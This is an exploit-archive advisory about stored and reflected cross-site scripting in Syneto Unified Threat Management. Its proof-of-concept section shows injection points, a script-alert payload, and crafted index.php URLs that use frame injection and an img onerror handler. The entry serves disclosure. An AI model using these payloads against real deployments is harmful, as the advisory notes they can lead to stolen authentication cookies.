Exploit Code
source: http://www.securityfocus.com/bid/51597/info Syneto Unified Threat Management is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible. Unified Threat Management 1.4.2 and 1.3.3 Community Edition are vulnerable; other versions may be affected. Proof of Concept: ================= The vulnerabilities can be exploited by privileged user accounts, lowviewers or remote attackers with required user inter action. For demonstration or reproduce ... 1.1.1 [+] Reports - Executive Summery - Output Listing Category <tr id="list_1" class="tableRowEven"> <td class="status" valign="top" align="center"> <a href="#" title="Disable the reporting list" class="disableList"><img src="img/enabled.gif" title="disable" alt="disable" class="disable"></a> <a style="display: none;" href="#" title="Enable the reporting list" class="enableList"> <img src="img/disabled.gif" title="enable" alt="enable" class="enable"></a> </td> <td valign="top"> "><EXECUTION OF PERSISTENT SCRIPT CODE!>' <<="" td=""> <td valign="top" nowrap="nowrap"> <a href="#" id="list_1" class="editList"><img src="img/edit.gif" title="Edit" alt="Edit" /></a> <a href="syneto.php?menuid=307&action=delete&id=1" class="deleteList">< ;img src="img/delete.gif" title="Delete" alt="Delete" /></a> </td> </tr> </tbody> </table> </div> Reference(s): https://www.example.com.com/syneto.php?menuid=307 1.1.2 [+] EMail - Filter Add & Configure <div>Sender = >"<EXECUTION OF PERSISTENT SCRIPT CODE!">.*</div> <div>Receiver = .*</div> <div>Subject = .*(SPAM|VIAGRA).*</div> Reference(s): https://www.example.com.com/syneto.php?menuid=63 1.1.3 [+] EMail Settings - New Domain "> <table class="data" id="smtpDomainsList"> <thead> <tr> <th class="status">Status</th> <th class="domain">Domain</th> <th class="routing">Routing</th> <th class="verify_sender">Verify sender</th> <th class="qdm">Send digest</th> <th class="actions">Actions</th> </tr> </thead> <tbody> <tr id="domain_3" class="tableRowEven editableDomain "><EXECUTION OF PERSISTENT SCRIPt CODE!><td class="status"> <input name="active" value="1" type="hidden"> <input name="qdm_enabled" value="" type="hidden"> <input name="qdm_hours" value="23" type="hidden"> <input name="admin_email" value=""><script>EXECUTION OF PERSISTENT SCRIPt CODE!</script>" type="hidden"> <input name="verify_peer" value="" type="hidden"> <input name="prefix_digest_links" value="" type="hidden"><EXECUTION OF PERSISTENT SCRIPT CODE!>" /> <input name="verify_sender" value="" type="hidden"> <input name="verify_sender_network_name" value="" type="hidden"><input name="qdm_exceptions" value="" type="hidden"> <input name="whitelist" value="" type="hidden"> <input name="blacklist" value="" type="hidden"><img class="clickable tooltip" title="" src="img/enabled.gif"> </td> <td class="domain">"><script>alert(vulnerabilitylab)</script></td> Reference(s): https://www.example.com.com/syneto.php?menuid=60 1.2 PoC: https://www.example.com.com/index.php?error=need_login"'><frame src=http://www.vulnerability-lab.com><hr>&from_menu=238 https://www.example.com.com/index.php?info=%3Cimg%20src=%22%3Cimg%20src=search%22/onerror=alert(%22vulnerabilitylab%22)//%22%3E Reference(s): https://www.example.com.com/index.php?error=need_login"'>EXECUTION OF PERSISTENT SCRIPT CODE!<hr>&from_menu=238 https://www.example.com.com/index.php?info=<EXECUTION OF PERSISTENT SCRIPT CODE!>%20%3E